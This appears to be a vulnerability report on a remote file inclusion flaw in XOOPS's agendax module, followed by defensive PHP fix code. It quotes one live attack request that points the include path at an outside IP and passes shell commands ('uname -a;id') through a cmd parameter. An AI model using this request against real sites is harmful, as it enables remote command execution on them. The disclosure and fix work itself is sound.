I have XOOPS 2.0.5.1 installed, which comes with agendax version 1.2. The file addevent.inc.php from the agendax module has been requested directly the following way:
/modules/agendax//addevent.inc.php?agendax_path=http://200.00.27.52&cmd=uname%20-a;id
The first significant lines of code in the file are:
include($agendax_path."/checkemail.inc.php");
if ($addeventok == 1) # enabled ?
{
...
The file is intended to be only included from another file and the $agendax_path variable is expected to be defined, but it is not when this file is requested directly, allowing for an external inclusion. If malicious code (e.g. system($cmd)) is included, command injection is available.
Since I don't know the code, I just closed the hole by exiting if REQUEST_URI matches /.inc.php/, but I'm sure there's a good way to solve this.
If you need more information, just mail me to quapropter at yahoo.com.ar. Hope this helps.
--
Guillermo Pereyra Irujo
Mar del Plata, Argentina
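The usual fix for this class of bug is an include guard plus a hard-coded include path, so the file refuses to run when requested directly and never builds a path from a variable that register_globals could let the request set. The following is an added example and is not code from the report above or from the agendax module; the constant name AGENDAX_INCLUDED and the parent script index.php are assumptions, while addevent.inc.php and checkemail.inc.php are the file names from the report.

```php
<?php
// Added example (not the agendax module's own code): guarding an include-only
// file against direct requests and against attacker-controlled include paths.
//
// Assumptions: the parent script (assumed to be the module's index.php)
// defines AGENDAX_INCLUDED before including addevent.inc.php.

// --- in the parent script (e.g. index.php), before the include ---
//   define('AGENDAX_INCLUDED', true);
//   include dirname(__FILE__) . '/addevent.inc.php';

// --- at the top of addevent.inc.php ---
if (!defined('AGENDAX_INCLUDED')) {
    // Direct request: the variables the parent would have set are missing,
    // so refuse outright instead of continuing with unset values.
    header('HTTP/1.0 403 Forbidden');
    exit;
}

// Reject anything that looks like a URL scheme (http://, ftp://, php://, ...)
// so a stray variable can never turn an include into a remote fetch.
function agendax_is_local_path($path)
{
    return !preg_match('#^[a-z][a-z0-9+.\-]*://#i', $path);
}

// Do not trust $agendax_path from the environment: derive it from this
// file's own directory, which the request cannot influence.
$agendax_path = dirname(__FILE__);

if (!agendax_is_local_path($agendax_path)) {
    exit('Invalid include path');
}

include $agendax_path . '/checkemail.inc.php';

if ($addeventok == 1) # enabled ?
{
    // ... original event-adding logic continues here ...
}
```

As defence in depth, the same deployment should turn off register_globals and allow_url_fopen in php.ini, so even an unguarded include cannot be pointed at a remote host by a query string.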